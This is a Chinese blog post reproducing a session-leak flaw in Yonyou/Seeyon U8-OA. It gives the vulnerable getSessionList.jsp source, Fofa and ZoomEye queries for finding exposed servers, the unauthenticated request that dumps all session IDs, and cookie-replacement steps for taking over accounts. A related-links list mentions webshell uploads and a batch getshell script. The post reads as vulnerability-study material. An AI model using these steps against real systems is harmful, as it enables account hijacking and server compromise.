用友致远U8-OA getSessionList jsp信息泄露复现

最新推荐文章于 2024-06-18 10:28:35 发布
原创 最新推荐文章于 2024-06-18 10:28:35 发布 · 2.1w 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#用友致远U8-OA漏洞 #SESSION泄露

本文详细介绍了用友U8-OA和致远A6系统中getSessionList.jsp文件存在的安全漏洞,攻击者可以通过该漏洞获取所有用户的SessionID,进一步登录并控制账户。漏洞源于文件没有进行权限验证,当cmd参数为getAll时,攻击者可以轻易获取SessionID。修复此问题需要增加权限验证机制,防止非法访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介

用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。

漏洞成因

getSessionList.jsp存在缺陷

<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
    String reqType = request.getParameter("cmd");
    String outXML = "";
    boolean allowHttps = true;
    if("allowHttps".equalsIgnoreCase(reqType)){
        //add code to judge whether it allow https or not
        allowHttps = FetchSessionList.checkHttps();
        if (allowHttps) response.setHeader("AllowHttps","1");
    }
    if("getAll".equalsIgnoreCase(reqType)){
        outXML = FetchSessionList.getXMLAll();
    }
    else if("getSingle".equalsIgnoreCase(reqType)){
        String sessionId = request.getParameter("ssid");
        if(sessionId != null){
            outXML = FetchSessionList.getXMLBySessionId(sessionId);
        }
    }
    else{
        outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n";
        outXML += "<SessionList>\r\n";
//        outXML += "<Session>\r\n";
//        outXML += "</Session>\r\n";
        outXML += "</SessionList>\r\n";
    }
    out.println(outXML);
%>

该文件没有权限验证,当cmd参数为getAll时,便可获取到所有用户的SessionID。

搜索语句

Fofa

app="Yonyou-Seeyon-OA"

ZoomEye

yyoa/index.jsp

漏洞检测

Payload:/yyoa/ext/https/getSessionList.jsp?cmd=getAll
Untitled_8RG3hxbQGAXz5t3za5VMXC.png

漏洞利用

获取SESSION之后访问:/yyoa/common/js/menu/menu.jsp,替换Cookie

Untitled 1_tUmAy2MyxBuNVXjmJHxjHm.png

Untitled 2_45Skh4xPBj1ncBrjhDbJb6.png

访问yyoa/portal/portalIndex.jsp进入首页

微信图片_20211104090439_u4ufNZsCvwQ5rdnpXiTYsx.png

用友U8-OA getSessionList.jsp信息泄露 复现
薛定谔嘚喵博客
10-08 360
用友U8-OA致远A6系统getSessionList.jsp文件都存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露SessionID即可登录该用户并获取shell。
致远OA漏洞学习——A6版本Session泄漏伪造漏洞
记录并分享学习安全的知识点..
05-08 3015
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 1.获取到所有用户的SessionID ,请求: 2.开始进行伪装,bp遍历替换其中一个Session值: 3.bp开始抓包放包得到如下页面: 4.访问/yyoa/portal/portalIndex.jsp进入首页 一、概述 通过使用存在漏洞的请求时,会回显所有在线用户的Session值,导致出现任意登录的情况,漏洞使用前提是必须系统是有人登录的。 二...
【nday】用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞复现
伏一
05-22 382
"用友 U8 OA"
致远OA Session泄露 任意文件上传漏洞
maverickpig的博客
07-19 1万+
网络安全自学日志-漏洞复现篇:致远OA Session泄露 任意文件上传漏洞 文章来自https://www.linuxlz.com/aqld/2104.html 工作中遇到的漏洞,记录一下 漏洞描述 致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器 漏洞影响 致远OA 漏洞复现 FOFA title=“致远” 首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyControl
漏洞复现致远OA移动智能办公平台存在Session敏感信息泄露漏洞
qq_34780861的博客
05-07 1276
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
高危CNVD|用友-U8-OA基础版存在文件上传漏洞getshell
最新发布
2401_83799022的博客
06-18 776
1、先使用之前存在的任意文件上传漏洞,上传一个jsp后缀文件到系统中,当然此处也可以直接使用系统中存在的jsp 文件直接覆盖写入,但存在破坏性。漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息。用友U8-OA基础版存在任意文件覆盖写入漏洞。到了此处高危CNVD就到手了!上传文件,文件内容为:11111。
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 2052
简单验证、复现漏洞
用友GRP-U8 SelectDMJE.jsp SQL注入漏洞复现
0xSec
01-18 700
用友GRP-U8R10行政事业内控管理软件SelectDMJE.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现用友-U8-CRM-文件上传-swfupload
知黑而守白
04-19 325
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。用友U8-CRM swfupload接口存在任意文件上传漏洞
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2724
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
seeyonAjaxGetshell:致远OA seeyon未授权漏洞批量getshell
05-28
seeyonAjaxGetshell 致远OAseeyon未授权漏洞+文件上传批量getshell 抄借鉴tools论坛大佬的payload写了个批量拿shell的脚本。 Note: 为了方便(懒比)直接调用curl,因此请在Linux下运行。 ip.txt --> 待检测IP shell.txt --> shell shell: 密码:rebeyond 冰蝎3连接 2020年1月9日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。 漏洞描述 致远OA是一套办公协同软件。近日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。由于致远OA旧版本某些ajax接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁,该漏洞利用代码已在互联网上公开流传。阿
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 9702
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
第六课(JSP-JSP的会话管理--用纯JSP实现对用户的鉴权
Jzandth的博客
09-27 719
JSP—会话管理 在纯用JSP实现登陆和跳转会员页面时,存在一个问题:各个JSP页面在Tomcat上都有一个具体的绝对地址,若不对某些专门为会员提供服务的页面进行鉴权,则当非法用户获取到提供服务页面的绝对地址时,其只需要在浏览器地址栏上填写该绝对地址,则可绕过登陆界面而直接进入对应的会员服务界面,获取非授权的服务。 在上一课中,servlet对从登陆页面传过来的参数做了if判断,起作用就相当于...
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
致远用友OA或M1 漏洞复现
ccz4854的博客
08-09 5576
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
基于jsp自定义标签,实现用户鉴权
weixin_30553777的博客
09-26 260
共分为4大部分: 1、自定义标签PermissionTagHandler应用场景 2、PermissionTagHandler类的实现 3、配置PermissionTagHandler 4、使用PermissionTagHandler 1、自定义标签PermissionTagHandler应用场景   用户列表userList.do需要,查看权限UserList 2...
Session鉴权【登录】
qq_44182694的博客
03-19 905
我们经常会遇到去一个网站,当你执行一个操作的时候需要登录 那么网站或者app是如何获知我们是否登录的呢? 今天介绍一个比较经典的方法 httpsession Session在HttpServletRequest request //serivce层 //将之前mapper层的注入过来 @Autowried private SysUserService sysusermapper; public Returndata login(Sysuser user,HttpServletRequest reques
用友OA漏洞复现手册
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
如何实现用户登录鉴权?两种方式手把手教会你!
weixin_57569942的博客
08-10 2644
利用Session和Jwt生辰的token实现用户登录鉴权
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值